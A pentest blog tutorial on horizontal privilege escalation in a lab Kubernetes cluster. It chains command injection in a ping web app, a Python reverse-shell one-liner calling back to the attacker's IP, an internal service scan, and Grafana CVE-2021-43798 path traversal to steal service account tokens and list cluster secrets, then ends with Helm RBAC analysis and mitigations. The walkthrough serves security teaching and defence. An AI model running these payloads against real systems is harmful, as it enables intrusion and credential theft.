Privileges escalation in kubernetes

Practical Look at Horizontal Privileges Escalation in Kubernetes

Written on Tue Dec 12 2023
8 minutes reading
pentest
grafana
kubernetes

Introduction

This articles will cover a real-world scenario of how and hackers will try to escalate privilege horizontally in a kubernetes cluster.

The code repository of this article is available on Github.

Synopsis

We have a web application running on a kubernetes cluster. The web application is a simple application that allow us to check if an element is connected to internet or not. We have to exploit the web application to get a shell on the pod that run the web application.

Our target will be the web application running on http://localhost:8080.

Discovery

Grabbing metadata

We have a web application, running on port 8080. We can access the web application using the browser.

When I'm performing a pentest, I like to use the following command to grab the banner of the web application and get quick insights about the application:

curl -IL http://localhost:8080

This gave us the following result:

HTTP/1.1 200 OK
Server: Werkzeug/2.3.4 Python/3.9.16
Date: Sun, 21 May 2023 13:41:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1627
Connection: close

We can see that the web application is running on Python/3.9.16. We can also see that the web application is running on the Werkzeug web server.

This informations are crucial for the discovery phase, now I know what kind of application is running and I know which runtime is powering the pplication.

Exploring the web application

Opening my web browser and navigating to http://localhost:8080 gave me the following page:

Application homepage

This page is pretty simple, we can enter a domain or IP adress and the application will tel us if the element is connected to internet or not.

(this scenario is volontary extremely explicit to make the article easier to understand) Testing the application using www.google.com

We can see that the application is working as expected. But more precisely, we see that the application is using the ping command to check if the element is connected to internet or not. At this step, an attacker can already start to think about how to exploit the application. There is multiple way to exploit this application, but we will focus on "Command Injection".

Command injection vulnerability is part of the OWASP Top 10. This vulnerability is ranked 3rd in the OWASP Top 10 2021 (A03:2021-Injection).

Exploiting the application

Inside the web application, we can see a form input that allow us to enter value and the prompt show us that the return is simply the response of the linux command ping <value> made on the server. We can try some command injection using | and ;, for example we can try ; ls that show us the webserver source code.

Testing command injection

Note: This work because the web application is executing shell command on the server, the command injection is possible because the web application is not sanitizing the user input.

Using that command injection, we can try to get a reverse shell on the server. If you don't know this concept, here is a simple explanation: How a reverse shell work

As a reminder, during the recognition phase, we have seen that the web application is running on Python/3.9.16. We can use this information to spawn a reverse shell on the server using some python code. To make the server initiate a connection to our machine, we can use the following command:

; python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("<YOUR_IP>",9001)); os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2); import pty; pty.spawn("/bin/bash")'

Don't forget to replace <YOUR_LOCAL_IP> by your IP address. Here we use the shell capabilities to insert our commands instead of the standard input. This command will spawn a reverse shell on the server, but we have to listen from our computer on the port 9001 to get the shell.

nc -lvnp 9001

When the python code will be interpreted, this will order the server to initiate a connection on the target IP and PORT provided (in our case, that's our laptop).

Gaining access

Now that we have a shell on the server, we can start to explore the server and try to find some interesting informations.

It's important at this step to take precaution and to not do anything that can alert the system administrator. As this demonstration is volontary simple, we will not take any precaution.

We can try, for example, to get information by listing environments variables.

env

Using this command, we can see that the server is running on a Kubernetes cluster.

We can try to list the pods running on the cluster using the following command:

# Get the service account token of the pod
export TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
# Interact with the cluster using the REST API
curl -H "Authorization: Bearer $TOKEN" "https://kubernetes.default.svc:443/api/v1/pods" -m 3 --insecure

Unfortunatly, our pod don't have the right to list the pods running on the cluster. But we can try to list the pods running on the cluster using other methods.

For example, by default, kubernetes services resources are on the ip range 10.96.0.0/16. We can try to discover other services using a simple script that will try to connect to all the ip address in the range on the specified ports.

#!/bin/bash
# Set the timeout value (in seconds)
timeout=0.03
# Loop through each IP address in the range 10.96.0.0/16
for third_octet in {0..255}; do
  for fourth_octet in {0..255}; do
    ip="10.96.$third_octet.$fourth_octet"

    # Loop through each port
    while read -r port; do
      url="http://${ip}:${port}"
      response_code=$(curl -s -o /dev/null -w "%{http_code}" --max-time $timeout "$url")

      if [[ $response_code -ge 200 && $response_code -lt 400 ]]; then
        echo "Success: $url (HTTP $response_code)"
        # Continue testing other combinations
      fi
    done < "ports.txt"
  done
  echo "Range 10.96.$third_octet.0/24 done"
done

Note that you have to create a file named ports.txt that contain the ports you want to test. For the demo, you can scope the ports to 3000.

We can now launch the script and do some internal recognition.

Scanning the cluster services

Our script found a service running on the ip 10.96.57.212. As it is an internal IP, you will only be able to access to it from the cluster.

We can set the ip on a variable to use it later:

export TARGET_IP=10.96.57.212

We can restart our discovery process on this ip address. For example I have run the following command to grab the banner, and after

curl -IL http://$TARGET_IP:3000

Here I notice that we are redirected on the url http://10.96.57.212:3000/login, so I can try to curl this page to get the content.

curl http://$TARGET_IP:3000/login

This appears to be a grafana dashboard login page.

Horizontal privilege escalation

Attacking the Grafana

Get the grafana version running:

curl http://$TARGET_IP:3000/login | grep "subTitle"

You should find that the grafana running is outdated and futhermore, the version 8.3.0 is well-know to be vulnerable to CVE-2021-43798.

Damn, it's vulnerable!

If you inspect the CVE informations and the exploit code, you can understand that we can use an endpoint to read file on the grafana server without being authenticated. The endpoint is /public/plugins/alertlist/../../../../../../../../etc/passwd

This vulnerability is a "path traversal" and allow to inject relative path in the url to reach file on the server. In our case, the vulnerability also allow us to read the file content.

We can try to get the content of the /etc/passwd file using the following command:

curl --path-as-is http://$TARGET_IP:3000/public/plugins/alertlist/../../../../../../../../etc/passwd

Reading /etc/passwd Damn, we can read the /etc/passwd file. That's mean we can read any file on the server. Obviously, that's cool and we are already gaining some cool stuff, but as a reminder, we are on a kubernetes cluster, we can get cooler stuff ;)

Kubernetes give serviceAccount to pods allowing them to have access, roles or others things. As described in the documentation, the ServiceAccount token of your Pod is provisionned by kubernetes on the pod filesystem at this location: /var/run/secrets/kubernetes.io/serviceaccount/token

Using this vulnerability on grafana and our knowledge, we can grab the service account token of grafana and use it to interact with the cluster.

curl --path-as-is http://$TARGET_IP:3000/public/plugins/alertlist/../../../../../../../../var/run/secrets/kubernetes.io/serviceaccount/token

You can check what's in the JWT on JWT.io

Usurping the grafana service account

export TOKEN=$(curl --path-as-is http://$TARGET_IP:3000/public/plugins/alertlist/../../../../../../../../var/run/secrets/kubernetes.io/serviceaccount/token)

At this step, we own the grafana serviceAccount token, allowing us to request the cluster as if we were the grafana pod. (And with the grafana serviceAccount permissions).

Now, we are able to get more information on the cluster as grafana have more permissions than our initial pod.

For example, you can try to list namespaces for your cluster:

curl -H "Authorization: Bearer $TOKEN" "https://kubernetes.default.svc:443/api/v1/namespaces" -m 3 --insecure

Unfortunatly, we can't list all namespace... Try something else. Listing pods.

curl -H "Authorization: Bearer $TOKEN" "https://kubernetes.default.svc:443/api/v1/pods" -m 3 --insecure

Important: As you are using the grafana serviceAccount, you will only see the pods that are on the same namespace as grafana. But you can change the namespace to see others resources.

For example, you can try to list the pods on the kube-system namespace:

curl -H "Authorization: Bearer $TOKEN" "https://kubernetes.default.svc:443/api/v1/namespaces/kube-system/pods" -m 3 --insecure

Okay, it's seem that there are no other pods on the clusters, we can try to get secrets.

curl -H "Authorization: Bearer $TOKEN" "https://kubernetes.default.svc:443/api/v1/secrets" -m 3 --insecure

For example, you can try to list the secrets on the kube-system namespace:

curl -H "Authorization: Bearer $TOKEN" "https://kubernetes.default.svc:443/api/v1/namespaces/kube-system/secrets" -m 3 --insecure

Getting kubernetes secrets

If you want to decrypt the secrets, you can use the following command:

echo <SECRET_VALUE> | base64 -d

Why can grafana get all secrets ?

It can apears strange that grafana can list all secrets in the cluster. This is explained because grafana serviceAccount is mapped on a clusterRole. For thoses who don't get it, clusterRole resources define permission you have on the whole cluster, and are not scoped to namespaces. If you need to set permissions scoped to a namespace, you have to set role.

The fun fact is that, some friends told me that: "no-one is giving cluster role to grafana"

So I decided to investigate this way, looking at helm charts for example: https://github.com/grafana/helm-charts/tree/main/charts/grafana

And I found this is the template named clusterrole.yaml:

{{- if and .Values.rbac.create (or (not .Values.rbac.namespaced) .Values.rbac.extraClusterRoleRules) (not .Values.rbac.useExistingClusterRole) }}
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  labels:
    {{- include "grafana.labels" . | nindent 4 }}
  {{- with .Values.annotations }}
  annotations:
    {{- toYaml . | nindent 4 }}
  {{- end }}
  name: {{ include "grafana.fullname" . }}-clusterrole
{{- if or .Values.sidecar.dashboards.enabled .Values.rbac.extraClusterRoleRules .Values.sidecar.datasources.enabled .Values.sidecar.plugins.enabled .Values.sidecar.alerts.enabled }}
rules:
  {{- if or .Values.sidecar.dashboards.enabled .Values.sidecar.datasources.enabled .Values.sidecar.plugins.enabled .Values.sidecar.alerts.enabled }}
  - apiGroups: [""] # "" indicates the core API group
    resources: ["configmaps", "secrets"]
    verbs: ["get", "watch", "list"]
  {{- end}}
  {{- with .Values.rbac.extraClusterRoleRules }}
  {{- toYaml . | nindent 2 }}
  {{- end}}
{{- else }}
rules: []
{{- end}}
{{- end}}

The interesting line is this one:

if and .Values.rbac.create (or (not .Values.rbac.namespaced)

To know what is the default configuration, we have to refer to the values.yml

And here it is:

global:
  imageRegistry: null
  imagePullSecrets: []

rbac:
  create: true
  pspEnabled: false
  pspUseAppArmor: false
  namespaced: false
  extraRoleRules: []

So, by default, grafana helm chart give your grafana deployment a clusterRole with the permission to get and list all secrets and configmaps on the cluster.

Interesting right ?

At the moment, I can't figure out why they did this, but I will try to contact them to have more informations.

Mitigation

It's important to audit your configuration and scope security issue, but it's more important to build mitigation solution to prevent this kind of issue.

In our case, we have 2 main troubleshoot, the first is the vulnerability on our webapp, this could be easily detected using some SAST, if you want more information on how to secure your pipeline, I recommend to refer to my previous article: Why DevOps guy have to care about cybersecurity

The second issue is the clusterRole given to grafana. This is a more complex issue, because it's not a vulnerability, it's a misconfiguration. And it's not easy to detect this kind of misconfiguration.

I brainstormed a little bit about this issue, of course, giving a role instead of a clusterRole considerably improve your security in case of compromision, but we can do more.

Grafana don't have to be requested by your cluster resources, grafana should only pull certains pod such as prometheus for example. You could implement a network policy to block all ingress traffic (except from your front dashboard/ingress) to grafana and allow egress only to DNS servers and prometheus agents (if you use grafana with prometheus).

Conclusion

In this article you saw how a misconfigured grafana instance can lead to a full cluster compromise.

There are important things to retains from this simple demonstration, first, you have to keep your application and dependencies updated and check for vulnerabilities oftenly. Second, if one pods of your cluster is compromised, it can request the whole cluster and permit horizontal escalation. Don't trust your pods, and always set the minimum permissions needed.

And the most important, always care about default configuration. Do not trust an editor.